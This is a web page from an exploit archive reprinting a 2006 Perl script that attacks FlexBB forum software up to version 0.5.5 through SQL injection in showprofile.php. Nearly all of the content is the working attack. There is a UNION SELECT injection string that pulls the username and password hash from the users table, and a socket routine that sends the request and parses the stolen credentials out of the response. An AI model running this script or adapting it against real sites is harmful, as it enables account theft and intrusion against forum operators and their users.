首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FlexBB <= 0.5.5 (function/showprofile.php) SQL Injection Exploit
来源:SecurityGurus.net 作者:D3vil 发布时间:2006-04-25  

#!/usr/bin/perl
use IO::Socket;
#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
#
# 1- First Do Login
# 2- View This Link :D
#
# index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
#
#-----------------------------------------------#
#
#--[ D3vil-0x1 | Devil-00 ]--#
#
# SecurityGurus.net
# Div The PHP Security Fucking Tool :D

##-- Start --#

$host = "127.0.0.1";
$path = "/flexbb/";
$injec = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";

##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# FlexBB Dir On Server | exm. /flexbb/
#
# $mycookie :-
# Your Login Info To Forum * Not The Real Password || The Hashed One *


$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Was Filed");

##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n\n";

print $sock $evildata;

while($ans = <$sock>){
$usr_newans = $ans;
$pwd_newans = $ans;
#print $newans;
$usr_newans =~ m/<title>FlexBB - Viewing Profile: (.*?)<\/title>/ && print "[+] Username is :- ".$1."\n";
$pwd_newans =~ m/<a href="2" target="_blank">(.*?)<\/a>/ && print "[+] Password is :- ".$1."\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Mac OS X Safari <= 2.
·Mozilla Firefox <= 1.5.0.2
·My Gaming Ladder Combo System
·Fenice OMS 1.10 (long get requ
·PHPSurveyor <= 0.995 (surve
·OCE 3121/3122 Printer (parser.
·PCPIN Chat <= 5.0.4 (login/
·Oracle <= 10g Release 2 (DB
·Mambo <= 4.5.3 , Joomla <
·Invision Power Board <= 2.1
·ASPSitem <= 1.83 (Haberler.
·BL4 SMTP Server < 0.1.5 Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved